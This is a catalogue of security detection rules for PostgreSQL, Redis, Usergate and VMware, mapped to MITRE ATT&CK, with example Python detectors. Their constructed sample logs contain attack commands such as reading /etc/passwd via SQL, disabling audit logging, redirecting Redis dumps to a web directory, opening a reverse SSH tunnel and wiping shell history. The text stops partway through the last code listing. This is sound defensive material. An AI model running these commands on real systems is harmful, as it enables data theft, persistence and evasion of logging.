PostgreSQL

RV-D-185

Successful Brute Force attack on the PostgreSQL DBMS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

pgAudit

PostgreSQL

PostgreSQL

RV-D-186

PostgreSQL database audit parameter change detected

TA0005 (Defense Evasion)

T1562 (Impair Defenses)

pgAudit

PostgreSQL

PostgreSQL

RV-D-187

Possible PostgreSQL database structure reconnaissance attempt

TA0007 (Discovery)

T1082 (System Information Discovery)

pgAudit

PostgreSQL

PostgreSQL

RV-D-188

File system interaction from a PostgreSQL database

TA0007 (Discovery)

T1083 (File and Directory Discovery)

pgAudit

PostgreSQL

PostgreSQL

RV-D-189

Retrieval of information about existing PostgreSQL accounts

TA0007 (Discovery)

T1087 (Account Discovery)

pgAudit

PostgreSQL

PostgreSQL

RV-D-190

PostgreSQL database configuration file modification

TA0040 (Impact)

T1565 (Data Manipulation)

Auditd

PostgreSQL

PostgreSQL

RV-D-191

Attempt to drop a database in PostgreSQL

TA0040 (Impact)

T1485 (Data Destruction)

pgAudit

PostgreSQL

PostgreSQL

RV-D-192

Privileged user login to the PostgreSQL DBMS from an unknown host

TA0003 (Persistence), TA0005 (Defense Evasion)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

pgAudit

PostgreSQL

PostgreSQL

RV-D-193

New account with superuser privileges in PostgreSQL

TA0003 (Persistence)

T1136 (Create Account)

pgAudit

PostgreSQL

PostgreSQL

RV-D-194

Password changed for an account with superuser privileges in PostgreSQL

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

pgAudit
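The PostgreSQL rules above (RV-D-182 through RV-D-194) all derive from the server log and pgAudit. The following detector is an added example written for this page; it is not the vendor's rule logic, whose internals the table does not show. It assumes log_line_prefix is set to '%m [%p] %h %u@%d ' so that the client host and user appear on every line, that pgAudit rows use their documented "AUDIT: SESSION,<id>,<sub>,<class>,<command>,<object type>,<object name>,<statement>,<parameter>" layout, and the thresholds (5 failures per user, 4 distinct users per host) are arbitrary. The sample log is constructed, not captured. The rule IDs in the output are this example's own reading of the table.

```python
import re
from collections import Counter, defaultdict

# Assumed log_line_prefix = '%m [%p] %h %u@%d ' (an assumption, not from the page).
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[\d+\] (?P<host>\S+) (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?P<level>\w+):\s+(?P<msg>.*)$"
)
FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
AUTH_OK_RE = re.compile(r"connection authorized: user=(?P<user>\S+)")

# Statement patterns mapped to the table's rule IDs (mapping is this example's reading).
AUDIT_RULES = [
    ("RV-D-193", re.compile(r"\bCREATE\s+ROLE\b.*\bSUPERUSER\b", re.I)),
    ("RV-D-186", re.compile(r"\b(ALTER\s+SYSTEM|SET)\b.*\bpgaudit\.", re.I)),
    ("RV-D-188", re.compile(r"\b(pg_read_file|pg_read_binary_file|pg_ls_dir|lo_import)\s*\(|\bFROM\s+PROGRAM\b", re.I)),
    ("RV-D-189", re.compile(r"\b(pg_authid|pg_shadow|pg_roles|pg_user)\b", re.I)),
    ("RV-D-191", re.compile(r"\bDROP\s+DATABASE\b", re.I)),
]


def _line(ts, pid, host, user, level, msg):
    return f"2024-05-01 {ts} UTC [{pid}] {host} {user}@app {level}:  {msg}"


# Constructed sample log: brute force + success from 10.0.0.5, spraying from 10.0.0.9,
# and a superuser session issuing audited statements from 10.0.0.7.
SAMPLE_LOG = "\n".join(
    [_line(f"10:00:0{i}.000", 4100 + i, "10.0.0.5", "alice", "FATAL",
           'password authentication failed for user "alice"') for i in range(5)]
    + [_line("10:00:09.000", 4109, "10.0.0.5", "alice", "LOG",
             "connection authorized: user=alice database=app")]
    + [_line(f"10:01:0{i}.000", 4200 + i, "10.0.0.9", u, "FATAL",
             f'password authentication failed for user "{u}"')
       for i, u in enumerate(["bob", "carol", "dave", "erin"])]
    + [_line("10:02:00.000", 4301, "10.0.0.7", "postgres", "LOG", msg) for msg in (
        'AUDIT: SESSION,1,1,ROLE,CREATE ROLE,,,"CREATE ROLE svc_backup SUPERUSER LOGIN PASSWORD \'x\'",<none>',
        'AUDIT: SESSION,2,1,MISC,ALTER SYSTEM,,,"ALTER SYSTEM SET pgaudit.log = \'none\'",<none>',
        'AUDIT: SESSION,3,1,READ,SELECT,,,"SELECT pg_read_file(\'/etc/passwd\')",<none>',
        'AUDIT: SESSION,4,1,READ,SELECT,,,"SELECT rolname FROM pg_authid",<none>',
        'AUDIT: SESSION,5,1,DDL,DROP DATABASE,,,"DROP DATABASE app_old",<none>',
    )]
)


def parse_pg_log(text):
    """Yield one dict per line that matches the assumed prefix; other lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def audit_statement(msg):
    """Return the SQL text from a pgAudit message, or None for ordinary log lines."""
    if not msg.startswith("AUDIT: "):
        return None
    fields = msg[len("AUDIT: "):].split(",", 7)   # type,id,sub,class,command,otype,oname,rest
    stmt = fields[7].rsplit(",", 1)[0]            # drop the trailing PARAMETER field
    return stmt.strip('"')


def detect_pg(text, fail_threshold=5, spray_threshold=4):
    """Return [(rule_id, detail)] in the order the evidence appears in the log."""
    alerts = []
    failures = Counter()          # (host, user) -> failed logins
    sprayed = defaultdict(set)    # host -> distinct users it failed against
    for r in parse_pg_log(text):
        msg, key = r["msg"], (r["host"], r["user"])
        if FAIL_RE.search(msg):
            failures[key] += 1
            sprayed[r["host"]].add(r["user"])
            if failures[key] == fail_threshold:
                alerts.append(("RV-D-182", f"{fail_threshold} failed logins for {r['user']} from {r['host']}"))
            if len(sprayed[r["host"]]) == spray_threshold:
                alerts.append(("RV-D-184", f"{r['host']} failed against {spray_threshold} distinct users"))
        elif AUTH_OK_RE.search(msg) and failures[key] >= fail_threshold:
            alerts.append(("RV-D-185", f"{r['user']} logged in from {r['host']} after {failures[key]} failures"))
        else:
            stmt = audit_statement(msg)
            if stmt:
                for rule_id, pat in AUDIT_RULES:
                    if pat.search(stmt):
                        alerts.append((rule_id, stmt))
    return alerts
```

The success-after-failures check (RV-D-185) is what turns a noisy brute-force alert into an incident, so it keys on the same (host, user) counter rather than on a separate rule. A production version would age the counters by time window and would read the statements from pgAudit's object-level logging where it is enabled.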

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-195

Password guessing against the Redis DBMS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Database events

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-196

Password Spraying attack on Redis

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Database events

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-197

Successful password guessing against Redis

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Database events

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-198

Privileged user login to Redis

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

Database events

Redis

Redis Enterprise Software

RV-D-583

New module added to a Redis cluster

TA0002 (Execution), TA0008 (Lateral Movement)

T1072 (Software Deployment Tools)

Redis Enterprise Software

Redis

Redis Enterprise Software

RV-D-590

Creation of a critical role in a Redis cluster

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1098 (Account Manipulation)

Redis Enterprise Software

Redis

Redis Enterprise Software

RV-D-591

Deletion of a Redis database instance

TA0040 (Impact)

T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Redis Enterprise Software

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-592

Creation of a new Redis user

TA0003 (Persistence)

T1136 (Create Account), T1136.001 (Create Account: Local Account)

Redis Enterprise Software, Redis Monitor

Redis

Redis Enterprise Software

RV-D-594

Critical role assigned to a Redis user

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1098 (Account Manipulation)

Redis Enterprise Software

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-584

Flush of a Redis database instance

TA0040 (Impact)

T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-585

Mass deletion of data in a Redis database instance

TA0040 (Impact)

T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-586

Dump of a Redis database instance

TA0009 (Collection)

T1005 (Data from Local System)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-587

Retrieval of information about a Redis database instance

TA0007 (Discovery)

T1082 (System Information Discovery)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-588

Enumeration of existing Redis database users

TA0007 (Discovery)

T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-589

Enumeration of existing keys in a Redis database instance

TA0007 (Discovery)

T1082 (System Information Discovery)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-593

Configuration change of a Redis database instance

TA0005 (Defense Evasion), TA0040 (Impact)

T1562.001 (Impair Defenses: Disable or Modify Tools), T1565 (Data Manipulation)

Redis Monitor
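The Redis rules whose source is "Redis Monitor" (RV-D-584 through RV-D-589, RV-D-592, RV-D-593) can be reproduced from the MONITOR command stream, which prints every command a client sends. The detector below is an added example for this page, not the vendor's rule content. It assumes the MONITOR line layout "<timestamp> [<db> <ip:port>] \"CMD\" \"arg\" ..." and a deletion threshold of 10 keys per client; the sample stream is constructed. It also adds one correlation the table does not list: a SAVE issued by the same client that just changed dir or dbfilename, which is how an RDB dump gets written to an attacker-chosen path.

```python
import re
from collections import Counter

# Assumed MONITOR layout: "<ts> [<db> <client>] \"CMD\" \"arg\" ..." (assumption, not from the page).
MON_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<argv>".*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# (command, subcommand-or-None) -> rule ID; the mapping is this example's reading of the table.
COMMAND_RULES = {
    ("CONFIG", "SET"): "RV-D-593", ("CONFIG", "REWRITE"): "RV-D-593",
    ("SAVE", None): "RV-D-586", ("BGSAVE", None): "RV-D-586", ("DUMP", None): "RV-D-586",
    ("INFO", None): "RV-D-587", ("CONFIG", "GET"): "RV-D-587", ("CLIENT", "LIST"): "RV-D-587",
    ("ACL", "LIST"): "RV-D-588", ("ACL", "USERS"): "RV-D-588", ("ACL", "GETUSER"): "RV-D-588",
    ("KEYS", None): "RV-D-589", ("SCAN", None): "RV-D-589",
    ("FLUSHALL", None): "RV-D-584", ("FLUSHDB", None): "RV-D-584",
    ("ACL", "SETUSER"): "RV-D-592",
}

# Constructed MONITOR stream: recon, config change + SAVE, user creation, then mass deletion.
SAMPLE_MONITOR = "\n".join(
    [
        '1714557600.000001 [0 10.0.0.5:51234] "INFO" "server"',
        '1714557600.000002 [0 10.0.0.5:51234] "ACL" "LIST"',
        '1714557600.000003 [0 10.0.0.5:51234] "KEYS" "*"',
        '1714557600.000004 [0 10.0.0.5:51234] "CONFIG" "SET" "dir" "/var/www/html"',
        '1714557600.000005 [0 10.0.0.5:51234] "CONFIG" "SET" "dbfilename" "backup.rdb"',
        '1714557600.000006 [0 10.0.0.5:51234] "SET" "x" "data"',
        '1714557600.000007 [0 10.0.0.5:51234] "SAVE"',
        '1714557600.000008 [0 10.0.0.5:51234] "ACL" "SETUSER" "backup" "on" ">p4ss" "~*" "+@all"',
        '1714557600.000009 [0 10.0.0.6:40001] "GET" "session:42"',
    ]
    + [f'1714557601.{i:06d} [0 10.0.0.7:40002] "DEL" "order:{i}"' for i in range(10)]
    + ['1714557602.000000 [0 10.0.0.7:40002] "FLUSHALL"']
)


def parse_monitor(text):
    """Yield (timestamp, client_ip, argv) for each MONITOR line; unparsable lines are skipped."""
    for line in text.splitlines():
        m = MON_RE.match(line)
        if m:
            yield float(m["ts"]), m["client"].rsplit(":", 1)[0], ARG_RE.findall(m["argv"])


def detect_redis(text, del_threshold=10):
    """Return [(rule_id, client_ip, detail)] in stream order."""
    alerts, deletes, dir_changed = [], Counter(), set()
    for _ts, client, argv in parse_monitor(text):
        if not argv:
            continue
        cmd = argv[0].upper()
        sub = argv[1].upper() if len(argv) > 1 else None
        rule = COMMAND_RULES.get((cmd, sub)) or COMMAND_RULES.get((cmd, None))
        if rule:
            alerts.append((rule, client, " ".join(argv)))
        # Correlation: dump written after the same client redirected where dumps land.
        if cmd == "CONFIG" and sub == "SET" and len(argv) > 2 and argv[2].lower() in ("dir", "dbfilename"):
            dir_changed.add(client)
        if cmd in ("SAVE", "BGSAVE") and client in dir_changed:
            alerts.append(("correlation", client, "RDB written after dir/dbfilename change by same client"))
        # Mass deletion: count keys, fire once when the threshold is crossed.
        if cmd in ("DEL", "UNLINK"):
            before = deletes[client]
            deletes[client] += len(argv) - 1
            if before < del_threshold <= deletes[client]:
                alerts.append(("RV-D-585", client, f"{deletes[client]} keys deleted"))
    return alerts
```

MONITOR redacts AUTH arguments in current Redis versions and costs throughput on a busy instance, so the password-guessing rules (RV-D-195 to RV-D-197) are better served by the server's own log or ACL LOG, and a production collector would tail MONITOR from a dedicated low-privilege connection rather than from an admin session.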

Usergate

Usergate NGFW

RV-D-208

Connection to an address from a reputation list

TA0011 (Command and Control)

T1102 (Web Service)

-

Usergate

Usergate NGFW

RV-D-209

Connection to a web resource with a high criticality level

TA0011 (Command and Control)

T1102 (Web Service)

-

Usergate

Usergate NGFW

RV-D-210

Connection to a web resource with a low criticality level

TA0011 (Command and Control)

T1102 (Web Service)

-

VMware

VMware ESXi

RV-D-226

Modification of virtual infrastructure auditing

TA0040 (Impact), TA0005 (Defense Evasion)

T1485 (Data Destruction)

hostd.log

VMware

VMware ESXi

RV-D-679

Critical ESXi service stopped

TA0040 (Impact)

T1489 (Service Stop)

shell.log

VMware

VMware ESXi

RV-D-680

Creation of SSH tunnels on ESXi

TA0011 (Command and Control), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1090 (Proxy), T1572 (Protocol Tunneling)

shell.log

VMware

VMware ESXi

RV-D-681

Use of find on ESXi

TA0002 (Execution), TA0007 (Discovery), TA0009 (Collection)

T1005 (Data from Local System), T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1070 (Indicator Removal), T1070.004 (Indicator Removal: File Deletion), T1083 (File and Directory Discovery)

shell.log

VMware

VMware ESXi

RV-D-682

Use of ESXi utilities via the CLI

TA0002 (Execution), TA0003 (Persistence), TA0005 (Defense Evasion), TA0007 (Discovery), TA0008 (Lateral Movement), TA0040 (Impact)

T1016 (System Network Configuration Discovery), T1018 (Remote System Discovery), T1021 (Remote Services), T1021.004 (Remote Services: SSH), T1049 (System Network Connections Discovery), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.012 (Command and Scripting Interpreter: Hypervisor CLI), T1070 (Indicator Removal), T1070.009 (Indicator Removal: Clear Persistence), T1082 (System Information Discovery), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1124 (System Time Discovery), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1485 (Data Destruction), T1489 (Service Stop), T1490 (Inhibit System Recovery), T1505 (Server Software Component), T1505.006 (Server Software Component: vSphere Installation Bundles), T1518 (Software Discovery), T1529 (System Shutdown/Reboot), T1561 (Disk Wipe), T1562.001 (Impair Defenses: Disable or Modify Tools), T1562.004 (Impair Defenses: Disable or Modify System Firewall), T1562.006 (Impair Defenses: Indicator Blocking), T1564 (Hide Artifacts), T1564.006 (Hide Artifacts: Run Virtual Instance), T1673 (Virtual Machine Discovery)

shell.log

VMware

VMware ESXi

RV-D-696

Vulnerable ESXi configuration detected

TA0002 (Execution), TA0008 (Lateral Movement), TA0001 (Initial Access), TA0005 (Defense Evasion)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1190 (Exploit Public-Facing Application), T1210 (Exploitation of Remote Services), T1562.004 (Impair Defenses: Disable or Modify System Firewall), T1569 (System Services)

shell.log, hostd.log, vobd.log, slpd.log

VMware

VMware ESXi

RV-D-718

Use of chmod on ESXi via the CLI

TA0005 (Defense Evasion), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1222 (File and Directory Permissions Modification), T1222.002 (File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification)

shell.log

VMware

VMware ESXi

RV-D-753

Deletion or disabling of command logging

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.003 (Indicator Removal: Clear Command History), T1562.003 (Impair Defenses: Impair Command History Logging)

shell.log

VMware

VMware ESXi

RV-D-754

Access to critical files on an ESXi server

TA0002 (Execution), TA0003 (Persistence)

T1037 (Boot or Logon Initialization Scripts), T1037.004 (Boot or Logon Initialization Scripts: RC Scripts), T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron), T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell)

shell.log

VMware

VMware ESXi

RV-D-760

Masquerading via renaming or replacement of index.html

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.005 (Masquerading: Match Legitimate Resource Name or Location)

shell.log

VMware

VMware ESXi

RV-D-761

Timestamp modification via touch

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.006 (Indicator Removal: Timestomp)

shell.log

VMware

VMware ESXi

RV-D-765

User access to ESXi revoked

TA0040 (Impact)

T1531 (Account Access Removal)

hostd.log
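Most ESXi rules above (RV-D-679 through RV-D-682, RV-D-718, RV-D-753, RV-D-754, RV-D-760, RV-D-761) read shell.log, which records every command typed in the ESXi shell or over SSH. The detector below is an added example for this page, not the vendor's rule logic. It assumes shell.log lines of the form "<ISO time> shell[<pid>]: [<user>]: <command>", and the technique tags on the esxcli/vim-cmd sub-patterns are this example's selection from the many techniques the table lists under RV-D-682. The sample lines are constructed.

```python
import re

# Assumed shell.log layout (assumption, not from the page):
# 2024-05-01T10:00:01Z shell[100001]: [root]: <command line>
SHELL_RE = re.compile(r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")

# (rule ID, technique, pattern over the command line). A line may match several rules.
RULES = [
    ("RV-D-680", "T1572", re.compile(r"^ssh\b.*\s-[a-zA-Z]*[RLDwW]")),          # -R/-L/-D/-w/-W tunnels
    ("RV-D-718", "T1222.002", re.compile(r"^chmod\s")),
    ("RV-D-761", "T1070.006", re.compile(r"^touch\b.*\s-(?:[a-z]*[rtd]\b|-(?:reference|date)\b)")),
    ("RV-D-753", "T1070.003", re.compile(r"\.ash_history|\bHISTFILE\b|/var/log/shell\.log")),
    ("RV-D-679", "T1489", re.compile(r"^(?:/etc/init\.d/\S+\s+stop|services\.sh\s+stop)\b")),
    ("RV-D-754", "T1037.004/T1053.003", re.compile(r"/etc/rc\.local\.d/local\.sh|/var/spool/cron/crontabs/")),
    ("RV-D-760", "T1036.005", re.compile(r"^(?:mv|cp)\s.*\bindex\.html\b")),
    ("RV-D-681", "T1083", re.compile(r"^find\s")),
    ("RV-D-682", "T1562.004", re.compile(r"^esxcli\s+network\s+firewall\s+set\s+.*--enabled\s+false")),
    ("RV-D-682", "T1529", re.compile(r"^vim-cmd\s+vmsvc/power\.off\b")),
    ("RV-D-682", "T1490", re.compile(r"^vim-cmd\s+vmsvc/snapshot\.removeall\b")),
    ("RV-D-682", "T1136.001", re.compile(r"^esxcli\s+system\s+account\s+add\b")),
    ("RV-D-682", "T1562.001", re.compile(r"^esxcli\s+system\s+settings\s+advanced\s+set\s+.*/User/execInstalledOnly\s+-i\s+0")),
]

# Constructed shell.log excerpt; the last line is benign and should produce no alert.
SAMPLE_SHELL_LOG = "\n".join([
    "2024-05-01T10:00:01Z shell[100001]: [root]: ssh -fN -R 2222:127.0.0.1:22 ops@203.0.113.10",
    "2024-05-01T10:00:02Z shell[100002]: [root]: chmod +x /tmp/svc",
    "2024-05-01T10:00:03Z shell[100003]: [root]: touch -r /bin/ls /tmp/svc",
    "2024-05-01T10:00:04Z shell[100004]: [root]: /etc/init.d/hostd stop",
    "2024-05-01T10:00:05Z shell[100005]: [root]: vi /etc/rc.local.d/local.sh",
    "2024-05-01T10:00:06Z shell[100006]: [root]: mv /usr/lib/vmware/hostd/docroot/index.html /usr/lib/vmware/hostd/docroot/index1.html",
    "2024-05-01T10:00:07Z shell[100007]: [root]: esxcli network firewall set --enabled false",
    "2024-05-01T10:00:08Z shell[100008]: [root]: vim-cmd vmsvc/power.off 12",
    '2024-05-01T10:00:09Z shell[100009]: [root]: find /vmfs/volumes -name "*.vmdk"',
    "2024-05-01T10:00:10Z shell[100010]: [root]: rm -f /root/.ash_history",
    "2024-05-01T10:00:11Z shell[100011]: [root]: ls /vmfs/volumes",
])


def parse_shell_log(text):
    """Yield (user, command) for each line matching the assumed layout."""
    for line in text.splitlines():
        m = SHELL_RE.match(line)
        if m:
            yield m["user"], m["cmd"]


def detect_esxi(text):
    """Return [(rule_id, technique, user, command)] in log order."""
    alerts = []
    for user, cmd in parse_shell_log(text):
        for rule_id, technique, pat in RULES:
            if pat.search(cmd):
                alerts.append((rule_id, technique, user, cmd))
    return alerts
```

shell.log is itself a target (RV-D-753 covers the history and log tampering), so the lines must leave the host in near real time via remote syslog; a detector that reads the local file after the fact will miss exactly the sessions it is meant to catch.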

VMware

VMware ESXi, VMware vCenter

RV-D-211

Multiple failed user authentication attempts

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-214

File download from a critical virtual machine

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-215

Download of multiple files from a critical virtual machine

TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1119 (Automated Collection)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-216

Password Spraying attack detected

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying), T1110.004 (Brute Force: Credential Stuffing)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-217

Possible successful user password guessing on VMware

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-218

Configuration change of a critical virtual machine

TA0040 (Impact), TA0011 (Command and Control), TA0005 (Defense Evasion)

T1095 (Non-Application Layer Protocol), T1485 (Data Destruction), T1565 (Data Manipulation), T1565.003 (Data Manipulation: Runtime Data Manipulation)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-219

Configuration change of multiple critical virtual machines

TA0040 (Impact), TA0011 (Command and Control), TA0005 (Defense Evasion)

T1095 (Non-Application Layer Protocol), T1485 (Data Destruction), T1485.001 (Data Destruction: Lifecycle-Triggered Deletion), T1565 (Data Manipulation), T1565.003 (Data Manipulation: Runtime Data Manipulation)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-223

Mass creation of virtual machines

TA0040 (Impact), TA0005 (Defense Evasion)

T1485 (Data Destruction), T1499 (Endpoint Denial of Service), T1499.001 (Endpoint Denial of Service: OS Exhaustion Flood), T1564 (Hide Artifacts), T1564.006 (Hide Artifacts: Run Virtual Instance)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-224

Critical virtual machine powered off

TA0040 (Impact), TA0005 (Defense Evasion)

T1485 (Data Destruction), T1529 (System Shutdown/Reboot)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-225

Multiple critical virtual machines powered off

TA0040 (Impact), TA0005 (Defense Evasion)

T1485 (Data Destruction), T1529 (System Shutdown/Reboot)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-227

Critical virtual machine deleted

TA0040 (Impact)

T1485 (Data Destruction)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-228

Multiple critical virtual machines deleted

TA0040 (Impact)

T1485 (Data Destruction)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-229

Login with a privileged account from an unknown host

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

vpxd.log

VMware

VMware ESXi, VMware vCenter

RV-D-769

Guest API invocation and execution in the guest OS

TA0002 (Execution)

T1675 (ESXi Administration Command)

vpxd.log, hostd.log

VMware

VMware vCenter

RV-D-212

Cloning of a critical virtual machine

TA0006 (Credential Access), TA0004 (Privilege Escalation), TA0003 (Persistence)

T1003 (OS Credential Dumping)

vpxd.log

VMware

VMware vCenter

RV-D-213

Cloning of multiple critical virtual machines

TA0006 (Credential Access), TA0004 (Privilege Escalation), TA0003 (Persistence)

T1003 (OS Credential Dumping)

vpxd.log

VMware

VMware vCenter

RV-D-220

Exploitation of CVE-2021-22005 on a vCenter server

TA0002 (Execution), TA0008 (Lateral Movement), TA0001 (Initial Access)

T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1210 (Exploitation of Remote Services)

Auditd

VMware

VMware vCenter

RV-D-221

Exploitation of CVE-2021-21972 on a vCenter server

TA0001 (Initial Access), TA0002 (Execution), TA0008 (Lateral Movement), TA0011 (Command and Control)

T1071 (Application Layer Protocol), T1071.001 (Application Layer Protocol: Web Protocols), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1210 (Exploitation of Remote Services)

Auditd, access.log

VMware

VMware vCenter

RV-D-222

Access to critical files on a vCenter server

TA0001 (Initial Access), TA0008 (Lateral Movement), TA0006 (Credential Access), TA0002 (Execution), TA0003 (Persistence)

T1037 (Boot or Logon Initialization Scripts), T1037.004 (Boot or Logon Initialization Scripts: RC Scripts), T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron), T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1110 (Brute Force), T1110.002 (Brute Force: Password Cracking), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1210 (Exploitation of Remote Services), T1212 (Exploitation for Credential Access), T1555 (Credentials from Password Stores)

Auditd
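The vCenter rules built on vpxd.log come in "single critical VM" / "multiple critical VMs" pairs (RV-D-212/213, RV-D-218/219, RV-D-224/225, RV-D-227/228) alongside the login rules RV-D-211, RV-D-216, RV-D-217 and RV-D-229. The correlation logic that pairing implies is shown below as an added example for this page, not the vendor's implementation. It assumes vpxd.log has already been normalized into records with the fields t (seconds), type, user, ip and vm; the type values are vSphere event type names, but the record shape, the critical-asset list, the known admin host, the 300-second window and all thresholds are assumptions. The records are constructed.

```python
from collections import defaultdict, deque

WINDOW = 300                                              # seconds; assumed correlation window
CRITICAL_VMS = {"dc01", "pki01", "backup01", "erp-db"}    # assumed critical-asset list
KNOWN_ADMIN_HOSTS = {"10.0.0.10"}                         # assumed allow-list for privileged logins
PRIVILEGED = {"administrator@vsphere.local"}

# vSphere event type -> (single-VM rule, multiple-VM rule); mapping is this example's reading of the table.
VM_RULES = {
    "VmPoweredOffEvent": ("RV-D-224", "RV-D-225"),
    "VmRemovedEvent": ("RV-D-227", "RV-D-228"),
    "VmClonedEvent": ("RV-D-212", "RV-D-213"),
    "VmReconfiguredEvent": ("RV-D-218", "RV-D-219"),
}

# Constructed, already-normalized records (field layout is an assumption, not vpxd.log's own).
EVENTS = (
    [{"t": 10 * i, "type": "BadUsernameSessionEvent", "user": u, "ip": "198.51.100.7"}
     for i, u in enumerate(["alice", "bob", "carol", "dave", "erin"])]
    + [
        {"t": 60, "type": "UserLoginSessionEvent", "user": "erin", "ip": "198.51.100.7"},
        {"t": 120, "type": "UserLoginSessionEvent", "user": "administrator@vsphere.local", "ip": "198.51.100.7"},
        {"t": 130, "type": "VmPoweredOffEvent", "user": "administrator@vsphere.local", "vm": "dc01"},
        {"t": 131, "type": "VmPoweredOffEvent", "user": "administrator@vsphere.local", "vm": "pki01"},
        {"t": 132, "type": "VmPoweredOffEvent", "user": "administrator@vsphere.local", "vm": "backup01"},
        {"t": 140, "type": "VmRemovedEvent", "user": "administrator@vsphere.local", "vm": "backup01"},
        {"t": 150, "type": "VmClonedEvent", "user": "administrator@vsphere.local", "vm": "dc01"},
        {"t": 900, "type": "VmPoweredOffEvent", "user": "ops", "vm": "test-web"},   # not critical: no alert
    ]
)


def _prune(dq, now):
    """Drop entries older than WINDOW from a deque of (t, value)."""
    while dq and now - dq[0][0] > WINDOW:
        dq.popleft()


def detect_vcenter(events, spray_threshold=4, fail_threshold=3, multi_threshold=3, create_threshold=5):
    """Return [(rule_id, detail)] in event order; events must be sorted by t."""
    alerts = []
    fails = defaultdict(deque)     # ip -> deque of (t, user) failed logins
    vm_ops = defaultdict(deque)    # (user, event type) -> deque of (t, vm)
    for e in events:
        t, typ, user = e["t"], e["type"], e["user"]
        if typ == "BadUsernameSessionEvent":
            dq = fails[e["ip"]]
            _prune(dq, t)
            dq.append((t, user))
            if len({u for _, u in dq}) == spray_threshold:
                alerts.append(("RV-D-216", f"{e['ip']} failed logins for {spray_threshold} distinct users"))
        elif typ == "UserLoginSessionEvent":
            dq = fails[e["ip"]]
            _prune(dq, t)
            if len(dq) >= fail_threshold:
                alerts.append(("RV-D-217", f"{user} logged in from {e['ip']} after {len(dq)} failures"))
            if user in PRIVILEGED and e["ip"] not in KNOWN_ADMIN_HOSTS:
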